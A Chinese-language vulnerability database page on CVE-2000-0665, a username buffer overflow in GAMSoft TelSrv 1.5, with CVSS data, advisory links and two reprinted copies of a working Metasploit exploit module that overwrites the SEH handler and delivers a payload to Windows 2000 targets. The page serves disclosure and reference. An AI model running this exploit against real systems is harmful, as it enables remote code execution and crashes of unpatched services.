CVE-2000-0665
CVSS5.0
发布时间 :2000-07-17 00:00:00
修订时间 :2008-09-05 16:21:35
NMCOEPS    

[原文]GAMSoft TelSrv telnet server 1.5 and earlier allows remote attackers to cause a denial of service via a long username.


[CNNVD]GAMSoft Telsrv DoS漏洞(CNNVD-200007-040)

        GAMSoft TelSrv远程服务器1.5版本及之前版本存在漏洞。远程攻击者可以借助超长用户名来导致服务拒绝。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:gamsoft:telsrv:1.4
cpe:/a:gamsoft:telsrv:1.5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0665
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0665
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200007-040
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/ntbugtraq/2000-q3/0031.html
(VENDOR_ADVISORY)  NTBUGTRAQ  20000717 DoS in Gamsoft TelSrv telnet server for MS Windows 95/98/NT/2k.
http://xforce.iss.net/static/4945.php
(VENDOR_ADVISORY)  XF  gamsoft-telsrv-dos
http://www.securityfocus.com/bid/1478
(VENDOR_ADVISORY)  BID  1478
http://www.osvdb.org/373
(UNKNOWN)  OSVDB  373
http://archives.neohapsis.com/archives/ntbugtraq/2000-q3/0056.html
(UNKNOWN)  NTBUGTRAQ  20000729 TelSrv Reveals Usernames & Passwords After DoS Attack

- 漏洞信息

GAMSoft Telsrv DoS漏洞
中危 边界条件错误
2000-07-17 00:00:00 2005-05-02 00:00:00
远程※本地  
        GAMSoft TelSrv远程服务器1.5版本及之前版本存在漏洞。远程攻击者可以借助超长用户名来导致服务拒绝。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 漏洞信息 (16816)

GAMSoft TelSrv 1.5 Username Buffer Overflow (EDBID:16816)
windows remote
2010-06-22 Verified
23 metasploit
N/A [点击下载]
##
# $Id: gamsoft_telsrv_username.rb 9583 2010-06-22 19:11:05Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking
	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'GAMSoft TelSrv 1.5 Username Buffer Overflow',
			'Description'	=> %q{
					This module exploits a username sprintf stack buffer overflow in GAMSoft TelSrv 1.5.
				Other versions may also be affected. The service terminates after exploitation,
				so you only get one chance!
			},
			'Author' 	=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'Arch'		=> [ ARCH_X86 ],
			'License'       => MSF_LICENSE,
			'Version'        => '$Revision: 9583 $',
			'References'    =>
				[
					[ 'CVE', '2000-0665'],
					[ 'OSVDB', '373'],
					[ 'BID', '1478'],
					[ 'URL', 'http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip'],
				],
			'Privileged'		=> false,
			'DefaultOptions'	=>
				{
					'EXITFUNC' 	=> 'thread',
				},
			'Payload'        	=>
				{
					'Space'			=> 1000,
					'BadChars' 		=> "\x00\x0a",
					'StackAdjustment' 	=> -3500,
				},
			'Platform' => ['win'],
			'Targets'  =>
				[
					[ 'Windows 2000 Pro SP0/4 English REMOTE',
						{
							'Ret'		=> 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
							'Offset'	=> 1886,
						}
					],

					[ 'Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)',
						{
							'Ret' 		=> 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
							'Offset'	=> 3318,
						}
					],

					[ 'Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)',
						{
							'Ret' 		=> 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
							'Offset' 	=> 3358,
						}
					],
=begin
					[ 'Windows XP Pro SP0/1 English',
						{
							'Ret' 		=> 0x71aa32ad, # pop/pop/ret xp pro en ALL
							'Offset'	=> 2600, # this is made up and absolutely wrong ;-)
						}
					],
=end
				],
			'DisclosureDate' => 'Jul 17 2000',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(23),
			], self.class)
	end

	def check
		connect
		print_status("Attempting to determine if target is vulnerable...")
		select(nil,nil,nil,7)
		banner = sock.get_once(-1,3)

		if (banner =~ /TelSrv 1\.5/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...")
		connect
		print_status("Connected to telnet service... waiting several seconds.") # User friendly message due to sleep.
		select(nil,nil,nil,7) # If unregistered version, you must wait for >5 seconds. Seven is safe. Six is not.

		username = rand_text_english(20000, payload_badchars)
		seh = generate_seh_payload(target.ret)
		username[target['Offset'], seh.length] = seh

		print_status("Sending #{ username.length} byte username as exploit (including #{seh.length} byte payload)...")
		sock.put(username)
		select(nil,nil,nil,0.25)
		print_status('Exploit sent...')
		handler
		disconnect
	end

end
		

- 漏洞信息 (F83042)

GAMSoft TelSrv 1.5 Username Buffer Overflow (PacketStormID:F83042)
2009-11-26 00:00:00
Patrick Webster  metasploit.com
exploit,overflow
CVE-2000-0665
[点击下载]

This Metasploit module exploits a username sprintf stack overflow in GAMSoft TelSrv 1.5. Other versions may also be affected. The service terminates after exploitation, so you only get one chance!

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ 
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {}) 
		super(update_info(info,    
			'Name'		=> 'GAMSoft TelSrv 1.5 Username Buffer Overflow',
			'Description'	=> %q{
            	This module exploits a username sprintf stack overflow in GAMSoft TelSrv 1.5.
			Other versions may also be affected. The service terminates after exploitation,
			so you only get one chance!
			},
			'Author' 	=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'Arch'		=> [ ARCH_X86 ], 
			'License'       => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'    =>
			[
				[ 'CVE', '2000-0665'],
				[ 'OSVDB', '373'],
				[ 'BID', '1478'], 
				[ 'URL', 'http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip'],
			],         
			'Privileged'		=> false, 
			'DefaultOptions'	=>
			{
				'EXITFUNC' 	=> 'thread',
			},
			'Payload'        	=>
				{ 
					'Space'			=> 1000,
					'BadChars' 		=> "\x00\x0a",
					'StackAdjustment' 	=> -3500,
				},
			'Platform' => ['win'],
			'Targets'  =>
			[
                 		[
				'Windows 2000 Pro SP0/4 English REMOTE',
				{
					'Ret'		=> 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
					'Offset'	=> 1886,
				}
				],
				[ 
				'Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)',
				{
					'Ret' 		=> 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
					'Offset'	=> 3318,
				}
				],
				[ 
				'Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)',
				{
					'Ret' 		=> 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
					'Offset' 	=> 3358,
				}
				],
			        #[
				#'Windows XP Pro SP0/1 English',
				#{
				#	'Ret' 		=> 0x71aa32ad, # pop/pop/ret xp pro en ALL
				#	'Offset'	=> 2600, # this is made up and absolutely wrong ;-)
				#}
				#],
				#[
			],
			'DisclosureDate' => 'Jul 17 2000', 
			'DefaultTarget' => 0))
            
			register_options(
			[
				Opt::RPORT(23),
			], self.class)
	end

	def check 
		connect
		print_status("Attempting to determine if target is vulnerable...")
		sleep(7)
		banner = sock.get_once(-1,3)

		if (banner =~ /TelSrv 1\.5/)
			return Exploit::CheckCode::Vulnerable 
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...") 
		connect
		print_status("Connected to telnet service... waiting several seconds.") # User friendly message due to sleep.
		sleep(7) # If unregistered version, you must wait for >5 seconds. Seven is safe. Six is not. 

		username = rand_text_english(20000, payload_badchars)
		seh = generate_seh_payload(target.ret)
		username[target['Offset'], seh.length] = seh
	
		print_status("Sending #{ username.length} byte username as exploit (including #{seh.length} byte payload)...")
		sock.put(username)
		sleep(0.25)
		print_status('Exploit sent...') 
		handler
		disconnect
	end

end
    

- 漏洞信息

373
GAMSoft TelSrv Multiple Field Overflow DoS
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity, Loss of Availability Discontinued Product, Solution Unknown
Exploit Public Uncoordinated Disclosure

- 漏洞描述

A remote overflow exists in GAMSoft's TelSrv. The telnet server fails to properly filter usernames and passwords resulting in a buffer overflow. With a specially crafted request, an attacker can cause the service to stop responding resulting in a loss of availability.

- 时间线

2000-07-17 Unknow
2000-07-17 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue. Further, this software is no longer being maintained.

- 相关参考

- 漏洞作者

- 漏洞信息

GAMSoft Telsrv DoS Vulnerability
Boundary Condition Error 1478
Yes Yes
2000-07-17 12:00:00 2008-02-01 06:47:00
Discovered by Prizm <Prizm@RESENTMENT.org> on July 17, 2000. Additional information provided by Patrick Webster <webster@PIS.COM.AU> on July 28, 2000.

- 受影响的程序版本

GAMSoft Telsrv 1.5
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
GAMSoft Telsrv 1.4
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0

- 漏洞讨论

GAMSoft Telsrv telnet server is prone to a trivial denial-of-service attack. If a malicious user were to connect to port 23 and supply a username of approximately 4550 characters, the telnet application would crash. Restarting the service is required to regain normal functionality.

In some cases, Telsrv will return an error message that contains a valid username and password in plain-text format. This can be used to gain unauthorized access to the telnet server.

- 漏洞利用

The following exploit code is available as a module for the Metasploit Framework:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站